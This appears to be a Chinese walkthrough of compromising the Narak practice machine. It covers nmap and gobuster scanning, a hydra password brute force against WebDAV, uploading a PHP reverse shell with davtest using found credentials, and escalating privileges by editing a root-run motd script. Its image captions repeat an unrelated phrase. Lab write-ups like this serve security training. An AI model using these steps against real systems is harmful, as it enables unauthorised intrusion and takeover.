目标IP:192.168.3.134

发现开放的端口

sudo nmap -p- 192.168.3.134

鹰眼模式推荐枪(Narak靶机笔记)(1)

探索端口的拥有的路径

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.3.134

鹰眼模式推荐枪(Narak靶机笔记)(2)

webdav账号密码登录

在这里发现弹出来了一个账号密码的登录窗口,使用cewl生成语义化的字典

cewl http::/192.168.3.134 -w dict.txt

然后尝试破解密码

hydra -L dict.txt -P dict.txt 192.168.3.134 http-get /webdav -v

鹰眼模式推荐枪(Narak靶机笔记)(3)

上传文件到FTP

davtest -url http://192.168.3.134/webdav -auth yamdoot:Swarg

鹰眼模式推荐枪(Narak靶机笔记)(4)

至此可以知道可以上传shell脚本到远程的FTP服务

davtest -url http://192.168.3.134/webdav -auth yamdoot:Swarg -uploadfile php-reverse-shell.php -uploadl.php

鹰眼模式推荐枪(Narak靶机笔记)(5)

探索靶机

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

鹰眼模式推荐枪(Narak靶机笔记)(6)

发现一个脚本,解密得到: chitragupt

利用 cat /etc/passwd 得到另一个用户: inferno

鹰眼模式推荐枪(Narak靶机笔记)(7)

发现该系统上有三个账户,为了得到好用的shell操作环境那么:ssh inferno@192.168.3.134,继续查找root权限且当前用户可写的文件

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

鹰眼模式推荐枪(Narak靶机笔记)(8)

nano /etc/update-motd.d/00-header

google得到这个文件的作用:Forbidden - Stack Exchange

修改欢迎语,重新登录

鹰眼模式推荐枪(Narak靶机笔记)(9)

DONE

,